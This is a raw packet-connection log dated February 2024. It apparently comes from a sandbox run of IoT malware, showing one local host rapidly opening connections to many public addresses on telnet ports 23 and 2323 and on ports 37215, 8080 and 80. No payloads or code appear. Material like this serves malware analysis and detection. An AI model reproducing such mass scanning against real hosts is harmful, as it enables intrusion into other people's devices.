                                                            Feb 14, 2024 09:27:45.861334085 CET375708080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:45.883780003 CET4067537215192.168.2.23157.3.51.93
                                                            Feb 14, 2024 09:27:45.883804083 CET4067537215192.168.2.23157.185.217.47
                                                            Feb 14, 2024 09:27:45.883817911 CET4067537215192.168.2.23157.85.179.186
                                                            Feb 14, 2024 09:27:45.883832932 CET4067537215192.168.2.23157.84.31.50
                                                            Feb 14, 2024 09:27:45.883850098 CET4067537215192.168.2.23157.214.186.160
                                                            Feb 14, 2024 09:27:45.883871078 CET4067537215192.168.2.23157.35.35.200
                                                            Feb 14, 2024 09:27:45.883871078 CET4067537215192.168.2.23157.168.144.23
                                                            Feb 14, 2024 09:27:45.883929968 CET4067537215192.168.2.23157.194.223.85
                                                            Feb 14, 2024 09:27:45.883929014 CET4067537215192.168.2.23157.239.97.230
                                                            Feb 14, 2024 09:27:45.883979082 CET4067537215192.168.2.23157.167.6.91
                                                            Feb 14, 2024 09:27:45.883984089 CET4067537215192.168.2.23157.79.240.40
                                                            Feb 14, 2024 09:27:45.883987904 CET4067537215192.168.2.23157.158.187.227
                                                            Feb 14, 2024 09:27:45.884004116 CET4067537215192.168.2.23157.63.22.165
                                                            Feb 14, 2024 09:27:45.884025097 CET4067537215192.168.2.23157.72.172.106
                                                            Feb 14, 2024 09:27:45.884035110 CET4067537215192.168.2.23157.204.7.222
                                                            Feb 14, 2024 09:27:45.884056091 CET4067537215192.168.2.23157.139.19.104
                                                            Feb 14, 2024 09:27:45.884076118 CET4067537215192.168.2.23157.228.40.176
                                                            Feb 14, 2024 09:27:45.884109020 CET4067537215192.168.2.23157.83.99.143
                                                            Feb 14, 2024 09:27:45.884109020 CET4067537215192.168.2.23157.167.247.67
                                                            Feb 14, 2024 09:27:45.884125948 CET4067537215192.168.2.23157.63.189.77
                                                            Feb 14, 2024 09:27:45.884150982 CET4067537215192.168.2.23157.33.40.57
                                                            Feb 14, 2024 09:27:45.884167910 CET4067537215192.168.2.23157.189.67.66
                                                            Feb 14, 2024 09:27:45.884200096 CET4067537215192.168.2.23157.203.158.131
                                                            Feb 14, 2024 09:27:45.884213924 CET4067537215192.168.2.23157.32.83.46
                                                            Feb 14, 2024 09:27:45.884242058 CET4067537215192.168.2.23157.82.1.129
                                                            Feb 14, 2024 09:27:45.884244919 CET4067537215192.168.2.23157.23.142.82
                                                            Feb 14, 2024 09:27:45.884282112 CET4067537215192.168.2.23157.66.134.41
                                                            Feb 14, 2024 09:27:45.884299040 CET4067537215192.168.2.23157.238.189.109
                                                            Feb 14, 2024 09:27:45.884321928 CET4067537215192.168.2.23157.241.105.253
                                                            Feb 14, 2024 09:27:45.884336948 CET4067537215192.168.2.23157.171.237.118
                                                            Feb 14, 2024 09:27:45.884361982 CET4067537215192.168.2.23157.79.99.221
                                                            Feb 14, 2024 09:27:45.884392977 CET4067537215192.168.2.23157.112.173.230
                                                            Feb 14, 2024 09:27:45.884418964 CET4067537215192.168.2.23157.206.87.145
                                                            Feb 14, 2024 09:27:45.884435892 CET4067537215192.168.2.23157.249.170.150
                                                            Feb 14, 2024 09:27:45.884454012 CET4067537215192.168.2.23157.31.44.41
                                                            Feb 14, 2024 09:27:45.884480000 CET4067537215192.168.2.23157.174.147.67
                                                            Feb 14, 2024 09:27:45.884491920 CET4067537215192.168.2.23157.93.59.37
                                                            Feb 14, 2024 09:27:45.884532928 CET4067537215192.168.2.23157.139.101.90
                                                            Feb 14, 2024 09:27:45.884548903 CET4067537215192.168.2.23157.91.34.23
                                                            Feb 14, 2024 09:27:45.884560108 CET4067537215192.168.2.23157.244.185.136
                                                            Feb 14, 2024 09:27:45.884608030 CET4067537215192.168.2.23157.170.135.153
                                                            Feb 14, 2024 09:27:45.884628057 CET4067537215192.168.2.23157.99.94.50
                                                            Feb 14, 2024 09:27:45.884628057 CET4067537215192.168.2.23157.29.146.95
                                                            Feb 14, 2024 09:27:45.884675026 CET4067537215192.168.2.23157.138.153.123
                                                            Feb 14, 2024 09:27:45.884697914 CET4067537215192.168.2.23157.177.138.57
                                                            Feb 14, 2024 09:27:45.884715080 CET4067537215192.168.2.23157.73.24.117
                                                            Feb 14, 2024 09:27:45.884715080 CET4067537215192.168.2.23157.97.135.185
                                                            Feb 14, 2024 09:27:45.884737968 CET4067537215192.168.2.23157.74.18.132
                                                            Feb 14, 2024 09:27:45.884737968 CET4067537215192.168.2.23157.251.73.244
                                                            Feb 14, 2024 09:27:45.884756088 CET4067537215192.168.2.23157.83.24.55
                                                            Feb 14, 2024 09:27:45.884771109 CET4067537215192.168.2.23157.46.141.246
                                                            Feb 14, 2024 09:27:45.884793997 CET4067537215192.168.2.23157.147.178.102
                                                            Feb 14, 2024 09:27:45.884840012 CET4067537215192.168.2.23157.236.41.171
                                                            Feb 14, 2024 09:27:45.884855986 CET4067537215192.168.2.23157.23.219.209
                                                            Feb 14, 2024 09:27:45.884855986 CET4067537215192.168.2.23157.232.145.31
                                                            Feb 14, 2024 09:27:45.884912968 CET4067537215192.168.2.23157.205.1.163
                                                            Feb 14, 2024 09:27:45.884929895 CET4067537215192.168.2.23157.153.210.207
                                                            Feb 14, 2024 09:27:45.884934902 CET4067537215192.168.2.23157.27.29.10
                                                            Feb 14, 2024 09:27:45.884939909 CET4067537215192.168.2.23157.15.75.179
                                                            Feb 14, 2024 09:27:45.884977102 CET4067537215192.168.2.23157.135.17.61
                                                            Feb 14, 2024 09:27:45.884987116 CET4067537215192.168.2.23157.32.172.78
                                                            Feb 14, 2024 09:27:45.884987116 CET4067537215192.168.2.23157.167.193.190
                                                            Feb 14, 2024 09:27:45.885010004 CET4067537215192.168.2.23157.157.31.104
                                                            Feb 14, 2024 09:27:45.885029078 CET4067537215192.168.2.23157.0.95.123
                                                            Feb 14, 2024 09:27:45.885042906 CET4067537215192.168.2.23157.11.158.32
                                                            Feb 14, 2024 09:27:45.885076046 CET4067537215192.168.2.23157.124.144.148
                                                            Feb 14, 2024 09:27:45.885103941 CET4067537215192.168.2.23157.146.110.22
                                                            Feb 14, 2024 09:27:45.885114908 CET4067537215192.168.2.23157.125.98.98
                                                            Feb 14, 2024 09:27:45.885166883 CET4067537215192.168.2.23157.153.226.74
                                                            Feb 14, 2024 09:27:45.885185957 CET4067537215192.168.2.23157.87.7.52
                                                            Feb 14, 2024 09:27:45.885199070 CET4067537215192.168.2.23157.129.176.48
                                                            Feb 14, 2024 09:27:45.885222912 CET4067537215192.168.2.23157.95.157.219
                                                            Feb 14, 2024 09:27:45.885252953 CET4067537215192.168.2.23157.43.208.171
                                                            Feb 14, 2024 09:27:45.885268927 CET4067537215192.168.2.23157.98.28.14
                                                            Feb 14, 2024 09:27:45.885268927 CET4067537215192.168.2.23157.245.141.112
                                                            Feb 14, 2024 09:27:45.885298014 CET4067537215192.168.2.23157.166.100.196
                                                            Feb 14, 2024 09:27:45.885330915 CET4067537215192.168.2.23157.84.213.91
                                                            Feb 14, 2024 09:27:45.885368109 CET4067537215192.168.2.23157.165.161.248
                                                            Feb 14, 2024 09:27:45.885374069 CET4067537215192.168.2.23157.113.163.33
                                                            Feb 14, 2024 09:27:45.885385036 CET4067537215192.168.2.23157.131.79.180
                                                            Feb 14, 2024 09:27:45.885437012 CET4067537215192.168.2.23157.224.120.53
                                                            Feb 14, 2024 09:27:45.885447025 CET4067537215192.168.2.23157.23.97.222
                                                            Feb 14, 2024 09:27:45.885461092 CET4067537215192.168.2.23157.173.89.243
                                                            Feb 14, 2024 09:27:45.885471106 CET4067537215192.168.2.23157.241.101.51
                                                            Feb 14, 2024 09:27:45.885502100 CET4067537215192.168.2.23157.173.87.199
                                                            Feb 14, 2024 09:27:45.885520935 CET4067537215192.168.2.23157.132.163.109
                                                            Feb 14, 2024 09:27:45.885539055 CET4067537215192.168.2.23157.166.163.240
                                                            Feb 14, 2024 09:27:45.885560036 CET4067537215192.168.2.23157.243.214.120
                                                            Feb 14, 2024 09:27:45.885593891 CET4067537215192.168.2.23157.79.252.241
                                                            Feb 14, 2024 09:27:45.885607958 CET4067537215192.168.2.23157.53.16.198
                                                            Feb 14, 2024 09:27:45.885626078 CET4067537215192.168.2.23157.60.194.29
                                                            Feb 14, 2024 09:27:45.885643005 CET4067537215192.168.2.23157.149.26.14
                                                            Feb 14, 2024 09:27:45.885643959 CET4067537215192.168.2.23157.182.145.171
                                                            Feb 14, 2024 09:27:45.885667086 CET4067537215192.168.2.23157.156.255.25
                                                            Feb 14, 2024 09:27:45.885678053 CET4067537215192.168.2.23157.190.126.185
                                                            Feb 14, 2024 09:27:45.885696888 CET4067537215192.168.2.23157.72.136.198
                                                            Feb 14, 2024 09:27:45.885718107 CET4067537215192.168.2.23157.62.247.201
                                                            Feb 14, 2024 09:27:45.885757923 CET4067537215192.168.2.23157.82.49.145
                                                            Feb 14, 2024 09:27:45.885776043 CET4067537215192.168.2.23157.1.125.248
                                                            Feb 14, 2024 09:27:45.885797024 CET4067537215192.168.2.23157.102.150.191
                                                            Feb 14, 2024 09:27:45.885797024 CET4067537215192.168.2.23157.227.67.225
                                                            Feb 14, 2024 09:27:45.885818958 CET4067537215192.168.2.23157.243.142.138
                                                            Feb 14, 2024 09:27:45.885840893 CET4067537215192.168.2.23157.94.92.187
                                                            Feb 14, 2024 09:27:45.885859013 CET4067537215192.168.2.23157.216.94.116
                                                            Feb 14, 2024 09:27:45.885909081 CET4067537215192.168.2.23157.172.7.153
                                                            Feb 14, 2024 09:27:45.885921955 CET4067537215192.168.2.23157.81.10.62
                                                            Feb 14, 2024 09:27:45.885941029 CET4067537215192.168.2.23157.131.163.54
                                                            Feb 14, 2024 09:27:45.885946989 CET4067537215192.168.2.23157.88.38.107
                                                            Feb 14, 2024 09:27:45.885967016 CET4067537215192.168.2.23157.169.144.231
                                                            Feb 14, 2024 09:27:45.886018991 CET4067537215192.168.2.23157.153.190.11
                                                            Feb 14, 2024 09:27:45.886050940 CET4067537215192.168.2.23157.248.160.196
                                                            Feb 14, 2024 09:27:45.886065960 CET4067537215192.168.2.23157.108.45.68
                                                            Feb 14, 2024 09:27:45.886081934 CET4067537215192.168.2.23157.82.195.227
                                                            Feb 14, 2024 09:27:45.886099100 CET4067537215192.168.2.23157.2.129.156
                                                            Feb 14, 2024 09:27:45.886125088 CET4067537215192.168.2.23157.45.191.250
                                                            Feb 14, 2024 09:27:45.886140108 CET4067537215192.168.2.23157.146.16.77
                                                            Feb 14, 2024 09:27:45.886157036 CET4067537215192.168.2.23157.124.149.210
                                                            Feb 14, 2024 09:27:45.886173964 CET4067537215192.168.2.23157.87.85.133
                                                            Feb 14, 2024 09:27:45.886193037 CET4067537215192.168.2.23157.87.229.38
                                                            Feb 14, 2024 09:27:45.886226892 CET4067537215192.168.2.23157.118.116.152
                                                            Feb 14, 2024 09:27:45.886248112 CET4067537215192.168.2.23157.187.196.128
                                                            Feb 14, 2024 09:27:45.886270046 CET4067537215192.168.2.23157.82.181.181
                                                            Feb 14, 2024 09:27:45.886270046 CET4067537215192.168.2.23157.182.151.9
                                                            Feb 14, 2024 09:27:45.886295080 CET4067537215192.168.2.23157.153.220.14
                                                            Feb 14, 2024 09:27:45.886303902 CET4067537215192.168.2.23157.177.196.220
                                                            Feb 14, 2024 09:27:45.886317015 CET4067537215192.168.2.23157.123.137.99
                                                            Feb 14, 2024 09:27:45.886327028 CET4067537215192.168.2.23157.138.69.120
                                                            Feb 14, 2024 09:27:45.886348963 CET4067537215192.168.2.23157.48.209.7
                                                            Feb 14, 2024 09:27:45.886363983 CET4067537215192.168.2.23157.26.48.109
                                                            Feb 14, 2024 09:27:45.886405945 CET4067537215192.168.2.23157.50.18.68
                                                            Feb 14, 2024 09:27:45.886428118 CET4067537215192.168.2.23157.56.81.242
                                                            Feb 14, 2024 09:27:45.886429071 CET4067537215192.168.2.23157.242.91.214
                                                            Feb 14, 2024 09:27:45.886475086 CET4067537215192.168.2.23157.169.137.124
                                                            Feb 14, 2024 09:27:45.886492014 CET4067537215192.168.2.23157.151.241.58
                                                            Feb 14, 2024 09:27:45.886537075 CET4067537215192.168.2.23157.100.70.182
                                                            Feb 14, 2024 09:27:45.886547089 CET4067537215192.168.2.23157.56.96.47
                                                            Feb 14, 2024 09:27:45.886555910 CET4067537215192.168.2.23157.61.59.16
                                                            Feb 14, 2024 09:27:45.886579037 CET4067537215192.168.2.23157.234.248.79
                                                            Feb 14, 2024 09:27:45.886596918 CET4067537215192.168.2.23157.218.143.227
                                                            Feb 14, 2024 09:27:45.886640072 CET4067537215192.168.2.23157.147.20.173
                                                            Feb 14, 2024 09:27:45.886662006 CET4067537215192.168.2.23157.87.21.138
                                                            Feb 14, 2024 09:27:45.886668921 CET4067537215192.168.2.23157.47.208.31
                                                            Feb 14, 2024 09:27:45.886694908 CET4067537215192.168.2.23157.176.97.235
                                                            Feb 14, 2024 09:27:45.886703968 CET4067537215192.168.2.23157.225.145.221
                                                            Feb 14, 2024 09:27:45.886723042 CET4067537215192.168.2.23157.247.34.172
                                                            Feb 14, 2024 09:27:45.886754990 CET4067537215192.168.2.23157.249.24.116
                                                            Feb 14, 2024 09:27:45.886775970 CET4067537215192.168.2.23157.192.174.76
                                                            Feb 14, 2024 09:27:45.886779070 CET4067537215192.168.2.23157.196.68.161
                                                            Feb 14, 2024 09:27:45.886800051 CET4067537215192.168.2.23157.146.31.219
                                                            Feb 14, 2024 09:27:45.886848927 CET4067537215192.168.2.23157.36.241.247
                                                            Feb 14, 2024 09:27:45.886852980 CET4067537215192.168.2.23157.155.133.200
                                                            Feb 14, 2024 09:27:45.886853933 CET4067537215192.168.2.23157.126.107.70
                                                            Feb 14, 2024 09:27:45.886862993 CET4067537215192.168.2.23157.160.172.113
                                                            Feb 14, 2024 09:27:45.886878967 CET4067537215192.168.2.23157.242.1.98
                                                            Feb 14, 2024 09:27:45.886933088 CET4067537215192.168.2.23157.35.248.224
                                                            Feb 14, 2024 09:27:45.886936903 CET4067537215192.168.2.23157.87.164.104
                                                            Feb 14, 2024 09:27:45.886971951 CET4067537215192.168.2.23157.64.127.3
                                                            Feb 14, 2024 09:27:45.886991978 CET4067537215192.168.2.23157.134.86.98
                                                            Feb 14, 2024 09:27:45.887010098 CET4067537215192.168.2.23157.196.180.100
                                                            Feb 14, 2024 09:27:45.887026072 CET4067537215192.168.2.23157.206.4.139
                                                            Feb 14, 2024 09:27:45.897932053 CET804067288.205.123.87192.168.2.23
                                                            Feb 14, 2024 09:27:45.904124022 CET804067288.99.172.170192.168.2.23
                                                            Feb 14, 2024 09:27:45.904196978 CET4067280192.168.2.2388.99.172.170
                                                            Feb 14, 2024 09:27:45.906081915 CET805863695.101.71.205192.168.2.23
                                                            Feb 14, 2024 09:27:45.906191111 CET5863680192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:45.906429052 CET5863680192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:45.906459093 CET5863680192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:45.906497955 CET5864080192.168.2.2395.101.71.205
                                                            Feb 14, 2024 09:27:45.913489103 CET804067288.218.206.33192.168.2.23
                                                            Feb 14, 2024 09:27:45.913562059 CET4067280192.168.2.2388.218.206.33
                                                            Feb 14, 2024 09:27:45.916084051 CET804948095.90.14.22192.168.2.23
                                                            Feb 14, 2024 09:27:45.916162968 CET4948080192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:45.916300058 CET3679680192.168.2.2388.218.206.33
                                                            Feb 14, 2024 09:27:45.916354895 CET4948080192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:45.916366100 CET4948080192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:45.916388988 CET4948680192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:45.924277067 CET803729295.213.203.34192.168.2.23
                                                            Feb 14, 2024 09:27:45.924343109 CET3729280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:45.924535036 CET3729280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:45.924551010 CET3729280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:45.924592018 CET3730480192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:46.053303957 CET375788080192.168.2.2331.136.123.97
                                                            Feb 14, 2024 09:27:46.085302114 CET470968080192.168.2.2331.136.121.101
                                                            Feb 14, 2024 09:27:46.085305929 CET414248080192.168.2.2331.136.155.230
                                                            Feb 14, 2024 09:27:46.090075016 CET80804068495.202.69.196192.168.2.23
                                                            Feb 14, 2024 09:27:46.093493938 CET406952323192.168.2.2384.154.105.252
                                                            Feb 14, 2024 09:27:46.093507051 CET4069523192.168.2.23155.21.173.94
                                                            Feb 14, 2024 09:27:46.093523026 CET4069523192.168.2.234.251.203.22
                                                            Feb 14, 2024 09:27:46.093524933 CET4069523192.168.2.23191.119.40.116
                                                            Feb 14, 2024 09:27:46.093527079 CET4069523192.168.2.23157.129.142.103
                                                            Feb 14, 2024 09:27:46.093538046 CET4069523192.168.2.23155.229.206.203
                                                            Feb 14, 2024 09:27:46.093538046 CET4069523192.168.2.23221.2.161.181
                                                            Feb 14, 2024 09:27:46.093549967 CET4069523192.168.2.2341.5.79.51
                                                            Feb 14, 2024 09:27:46.093556881 CET4069523192.168.2.23108.29.226.150
                                                            Feb 14, 2024 09:27:46.093556881 CET406952323192.168.2.2371.142.255.244
                                                            Feb 14, 2024 09:27:46.093564034 CET4069523192.168.2.23159.5.145.186
                                                            Feb 14, 2024 09:27:46.093564987 CET4069523192.168.2.2383.136.186.99
                                                            Feb 14, 2024 09:27:46.093575954 CET4069523192.168.2.2336.93.37.97
                                                            Feb 14, 2024 09:27:46.093576908 CET4069523192.168.2.2399.212.164.88
                                                            Feb 14, 2024 09:27:46.093585968 CET4069523192.168.2.23162.197.14.64
                                                            Feb 14, 2024 09:27:46.093586922 CET4069523192.168.2.23219.21.159.210
                                                            Feb 14, 2024 09:27:46.093596935 CET4069523192.168.2.2354.72.137.178
                                                            Feb 14, 2024 09:27:46.093595982 CET4069523192.168.2.2391.238.145.118
                                                            Feb 14, 2024 09:27:46.093596935 CET4069523192.168.2.2319.70.22.2
                                                            Feb 14, 2024 09:27:46.093596935 CET4069523192.168.2.2346.206.224.75
                                                            Feb 14, 2024 09:27:46.093614101 CET4069523192.168.2.2340.105.89.89
                                                            Feb 14, 2024 09:27:46.093628883 CET4069523192.168.2.23213.210.70.245
                                                            Feb 14, 2024 09:27:46.093628883 CET4069523192.168.2.232.155.92.35
                                                            Feb 14, 2024 09:27:46.093631029 CET4069523192.168.2.2367.53.167.116
                                                            Feb 14, 2024 09:27:46.093636036 CET4069523192.168.2.2381.190.112.169
                                                            Feb 14, 2024 09:27:46.093646049 CET4069523192.168.2.2343.114.160.118
                                                            Feb 14, 2024 09:27:46.093667030 CET406952323192.168.2.23198.128.158.164
                                                            Feb 14, 2024 09:27:46.093667030 CET4069523192.168.2.231.57.223.247
                                                            Feb 14, 2024 09:27:46.093667984 CET4069523192.168.2.23219.242.220.253
                                                            Feb 14, 2024 09:27:46.093667984 CET406952323192.168.2.2371.101.183.19
                                                            Feb 14, 2024 09:27:46.093668938 CET4069523192.168.2.23183.165.75.58
                                                            Feb 14, 2024 09:27:46.093677998 CET4069523192.168.2.2373.180.172.157
                                                            Feb 14, 2024 09:27:46.093682051 CET4069523192.168.2.23173.103.137.4
                                                            Feb 14, 2024 09:27:46.093691111 CET4069523192.168.2.23162.221.222.21
                                                            Feb 14, 2024 09:27:46.093703985 CET4069523192.168.2.23172.7.223.241
                                                            Feb 14, 2024 09:27:46.093703985 CET4069523192.168.2.23200.94.130.15
                                                            Feb 14, 2024 09:27:46.093708038 CET4069523192.168.2.2353.170.67.64
                                                            Feb 14, 2024 09:27:46.093722105 CET4069523192.168.2.23113.124.57.157
                                                            Feb 14, 2024 09:27:46.093722105 CET4069523192.168.2.23103.119.146.249
                                                            Feb 14, 2024 09:27:46.093729019 CET4069523192.168.2.2334.47.119.224
                                                            Feb 14, 2024 09:27:46.093744993 CET4069523192.168.2.23153.34.38.228
                                                            Feb 14, 2024 09:27:46.093744993 CET4069523192.168.2.23106.215.27.237
                                                            Feb 14, 2024 09:27:46.093745947 CET4069523192.168.2.23126.139.143.98
                                                            Feb 14, 2024 09:27:46.093760967 CET4069523192.168.2.2337.196.227.54
                                                            Feb 14, 2024 09:27:46.093761921 CET4069523192.168.2.23135.208.23.240
                                                            Feb 14, 2024 09:27:46.093769073 CET4069523192.168.2.2334.160.152.169
                                                            Feb 14, 2024 09:27:46.093777895 CET4069523192.168.2.23185.5.6.102
                                                            Feb 14, 2024 09:27:46.093785048 CET4069523192.168.2.23216.69.249.47
                                                            Feb 14, 2024 09:27:46.093786955 CET4069523192.168.2.2368.167.64.152
                                                            Feb 14, 2024 09:27:46.093786955 CET406952323192.168.2.23171.240.102.172
                                                            Feb 14, 2024 09:27:46.093792915 CET406952323192.168.2.23149.141.193.89
                                                            Feb 14, 2024 09:27:46.093800068 CET4069523192.168.2.23166.243.204.152
                                                            Feb 14, 2024 09:27:46.093800068 CET4069523192.168.2.23106.182.167.239
                                                            Feb 14, 2024 09:27:46.093813896 CET4069523192.168.2.2397.124.9.77
                                                            Feb 14, 2024 09:27:46.093815088 CET4069523192.168.2.23183.52.159.220
                                                            Feb 14, 2024 09:27:46.093831062 CET4069523192.168.2.23190.108.32.171
                                                            Feb 14, 2024 09:27:46.093833923 CET4069523192.168.2.23181.138.45.90
                                                            Feb 14, 2024 09:27:46.093833923 CET4069523192.168.2.23174.28.162.62
                                                            Feb 14, 2024 09:27:46.093853951 CET406952323192.168.2.2393.24.131.107
                                                            Feb 14, 2024 09:27:46.093853951 CET4069523192.168.2.23115.141.61.151
                                                            Feb 14, 2024 09:27:46.093853951 CET4069523192.168.2.23139.140.85.47
                                                            Feb 14, 2024 09:27:46.093863964 CET4069523192.168.2.23115.121.243.202
                                                            Feb 14, 2024 09:27:46.093867064 CET4069523192.168.2.2383.210.230.173
                                                            Feb 14, 2024 09:27:46.093869925 CET4069523192.168.2.2371.150.81.222
                                                            Feb 14, 2024 09:27:46.093873024 CET4069523192.168.2.2345.136.177.56
                                                            Feb 14, 2024 09:27:46.093880892 CET4069523192.168.2.23196.130.9.218
                                                            Feb 14, 2024 09:27:46.093892097 CET4069523192.168.2.23131.199.218.197
                                                            Feb 14, 2024 09:27:46.093898058 CET4069523192.168.2.2317.52.84.29
                                                            Feb 14, 2024 09:27:46.093902111 CET406952323192.168.2.2337.250.200.109
                                                            Feb 14, 2024 09:27:46.093903065 CET4069523192.168.2.23178.218.156.74
                                                            Feb 14, 2024 09:27:46.093911886 CET4069523192.168.2.2377.216.65.82
                                                            Feb 14, 2024 09:27:46.093921900 CET4069523192.168.2.2332.126.122.216
                                                            Feb 14, 2024 09:27:46.093921900 CET4069523192.168.2.2345.61.9.127
                                                            Feb 14, 2024 09:27:46.093921900 CET4069523192.168.2.23175.211.0.203
                                                            Feb 14, 2024 09:27:46.093943119 CET4069523192.168.2.238.149.219.225
                                                            Feb 14, 2024 09:27:46.093945026 CET4069523192.168.2.2335.232.212.98
                                                            Feb 14, 2024 09:27:46.093950033 CET4069523192.168.2.23200.128.104.117
                                                            Feb 14, 2024 09:27:46.093955040 CET4069523192.168.2.2320.177.84.46
                                                            Feb 14, 2024 09:27:46.093955040 CET4069523192.168.2.2376.167.75.61
                                                            Feb 14, 2024 09:27:46.093955040 CET406952323192.168.2.2369.83.3.55
                                                            Feb 14, 2024 09:27:46.093962908 CET4069523192.168.2.23179.9.82.199
                                                            Feb 14, 2024 09:27:46.093971014 CET4069523192.168.2.23123.189.243.198
                                                            Feb 14, 2024 09:27:46.093975067 CET4069523192.168.2.23159.223.128.104
                                                            Feb 14, 2024 09:27:46.093976974 CET4069523192.168.2.23198.0.90.159
                                                            Feb 14, 2024 09:27:46.093986988 CET4069523192.168.2.23168.200.195.54
                                                            Feb 14, 2024 09:27:46.093997002 CET4069523192.168.2.2366.195.70.154
                                                            Feb 14, 2024 09:27:46.093997955 CET4069523192.168.2.23182.196.68.226
                                                            Feb 14, 2024 09:27:46.093997955 CET4069523192.168.2.23146.80.145.118
                                                            Feb 14, 2024 09:27:46.093997955 CET4069523192.168.2.23152.246.193.96
                                                            Feb 14, 2024 09:27:46.094016075 CET4069523192.168.2.2339.232.225.140
                                                            Feb 14, 2024 09:27:46.094017029 CET406952323192.168.2.2369.35.139.140
                                                            Feb 14, 2024 09:27:46.094022989 CET4069523192.168.2.23168.228.66.72
                                                            Feb 14, 2024 09:27:46.094022989 CET4069523192.168.2.2335.64.19.163
                                                            Feb 14, 2024 09:27:46.094037056 CET4069523192.168.2.2385.55.192.48
                                                            Feb 14, 2024 09:27:46.094039917 CET4069523192.168.2.23199.159.222.243
                                                            Feb 14, 2024 09:27:46.094039917 CET4069523192.168.2.23143.52.228.76
                                                            Feb 14, 2024 09:27:46.094046116 CET4069523192.168.2.23161.213.153.102
                                                            Feb 14, 2024 09:27:46.094053030 CET4069523192.168.2.23118.251.216.54
                                                            Feb 14, 2024 09:27:46.094053984 CET4069523192.168.2.23129.122.231.99
                                                            Feb 14, 2024 09:27:46.094069958 CET4069523192.168.2.2331.105.66.168
                                                            Feb 14, 2024 09:27:46.094074011 CET406952323192.168.2.2347.109.68.231
                                                            Feb 14, 2024 09:27:46.094074011 CET4069523192.168.2.2318.1.210.229
                                                            Feb 14, 2024 09:27:46.094085932 CET4069523192.168.2.2314.162.20.134
                                                            Feb 14, 2024 09:27:46.094094992 CET4069523192.168.2.2360.126.247.60
                                                            Feb 14, 2024 09:27:46.094099045 CET4069523192.168.2.23153.25.16.177
                                                            Feb 14, 2024 09:27:46.094110966 CET4069523192.168.2.231.189.207.51
                                                            Feb 14, 2024 09:27:46.094115973 CET4069523192.168.2.23128.197.92.46
                                                            Feb 14, 2024 09:27:46.094120026 CET4069523192.168.2.2323.47.128.119
                                                            Feb 14, 2024 09:27:46.094122887 CET4069523192.168.2.23176.143.230.252
                                                            Feb 14, 2024 09:27:46.094134092 CET4069523192.168.2.23109.153.33.254
                                                            Feb 14, 2024 09:27:46.094134092 CET406952323192.168.2.23207.100.10.243
                                                            Feb 14, 2024 09:27:46.094146013 CET4069523192.168.2.235.54.236.162
                                                            Feb 14, 2024 09:27:46.094152927 CET4069523192.168.2.2396.214.117.246
                                                            Feb 14, 2024 09:27:46.094152927 CET4069523192.168.2.23202.104.30.144
                                                            Feb 14, 2024 09:27:46.094167948 CET4069523192.168.2.2364.24.245.44
                                                            Feb 14, 2024 09:27:46.094187021 CET4069523192.168.2.23128.40.151.154
                                                            Feb 14, 2024 09:27:46.094187021 CET4069523192.168.2.23165.166.93.146
                                                            Feb 14, 2024 09:27:46.094187021 CET4069523192.168.2.23223.171.196.74
                                                            Feb 14, 2024 09:27:46.094187975 CET4069523192.168.2.23160.127.120.227
                                                            Feb 14, 2024 09:27:46.094191074 CET4069523192.168.2.23144.149.73.115
                                                            Feb 14, 2024 09:27:46.094197035 CET406952323192.168.2.23165.184.255.58
                                                            Feb 14, 2024 09:27:46.094202995 CET4069523192.168.2.2367.143.124.170
                                                            Feb 14, 2024 09:27:46.094207048 CET4069523192.168.2.2331.200.81.107
                                                            Feb 14, 2024 09:27:46.094207048 CET4069523192.168.2.23137.125.114.131
                                                            Feb 14, 2024 09:27:46.094223022 CET4069523192.168.2.23109.219.88.169
                                                            Feb 14, 2024 09:27:46.094228983 CET4069523192.168.2.2395.195.89.163
                                                            Feb 14, 2024 09:27:46.094230890 CET4069523192.168.2.23126.143.172.231
                                                            Feb 14, 2024 09:27:46.094245911 CET4069523192.168.2.23192.1.69.140
                                                            Feb 14, 2024 09:27:46.094250917 CET4069523192.168.2.23125.220.89.146
                                                            Feb 14, 2024 09:27:46.094258070 CET406952323192.168.2.23117.102.100.180
                                                            Feb 14, 2024 09:27:46.094269991 CET4069523192.168.2.23175.228.128.111
                                                            Feb 14, 2024 09:27:46.094270945 CET4069523192.168.2.23201.49.219.183
                                                            Feb 14, 2024 09:27:46.094285965 CET4069523192.168.2.23211.175.104.37
                                                            Feb 14, 2024 09:27:46.094288111 CET4069523192.168.2.23145.91.255.36
                                                            Feb 14, 2024 09:27:46.094290972 CET4069523192.168.2.2369.211.115.54
                                                            Feb 14, 2024 09:27:46.094301939 CET4069523192.168.2.23186.171.213.163
                                                            Feb 14, 2024 09:27:46.094309092 CET4069523192.168.2.2348.99.169.130
                                                            Feb 14, 2024 09:27:46.094309092 CET4069523192.168.2.23160.90.115.146
                                                            Feb 14, 2024 09:27:46.094310999 CET4069523192.168.2.23116.66.24.67
                                                            Feb 14, 2024 09:27:46.094321012 CET4069523192.168.2.23174.19.219.146
                                                            Feb 14, 2024 09:27:46.094322920 CET4069523192.168.2.2365.68.58.218
                                                            Feb 14, 2024 09:27:46.094322920 CET406952323192.168.2.2369.108.86.227
                                                            Feb 14, 2024 09:27:46.094331980 CET4069523192.168.2.2317.253.226.156
                                                            Feb 14, 2024 09:27:46.094335079 CET4069523192.168.2.23128.239.67.155
                                                            Feb 14, 2024 09:27:46.094337940 CET4069523192.168.2.2373.21.188.123
                                                            Feb 14, 2024 09:27:46.094351053 CET4069523192.168.2.2350.215.232.5
                                                            Feb 14, 2024 09:27:46.094352007 CET4069523192.168.2.2343.63.94.105
                                                            Feb 14, 2024 09:27:46.094355106 CET406952323192.168.2.23136.99.44.211
                                                            Feb 14, 2024 09:27:46.094356060 CET4069523192.168.2.2343.18.116.0
                                                            Feb 14, 2024 09:27:46.094367027 CET4069523192.168.2.23201.167.101.38
                                                            Feb 14, 2024 09:27:46.094371080 CET4069523192.168.2.23206.54.135.64
